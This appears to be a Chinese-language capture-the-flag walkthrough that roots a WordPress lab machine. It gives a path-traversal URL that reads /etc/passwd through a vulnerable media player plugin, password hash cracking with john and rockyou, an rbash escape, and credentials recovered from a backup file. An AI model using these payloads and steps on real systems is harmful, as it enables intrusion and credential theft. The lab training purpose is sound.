确定靶机IP地址

扫描靶机开放端口信息

目录扫描

访问后发现个邮箱地址

尝试爆破二级目录

确定为wordpress站

利用wpscan进行漏洞扫描 #扫描所有插件

wpscan --url http://192.168.0.2/tsweb -e ap

发现存在漏洞插件

cat /usr/share/exploitdb/exploits/php/webapps/46537.txt

存在文件包含漏洞，这里查看到/etc/passwd的内容，复制flag的哈希值用john进行爆破

http://192.168.0.2/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash' > test

gunzip /usr/share/wordlists/rockyou.txt.gz

john test --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt  #topsecret

密码

#flag用户的shell是rbash shell，需要提升shell权限

python3 -c 'import pty;pty.spawn("/bin/bash")'

常规信息收集不具备提权条件，进行备份文件的查找或者上传内核漏洞检测脚本

find / -name  backups

在备份文件/var/backups/passbkp中成功找到rohit用户的密码$1$rohit$01Dl0NQKtgfeL08fGrggi0

通过sudo -l可以看到所有的权限，直接用sudo su就可以切换到root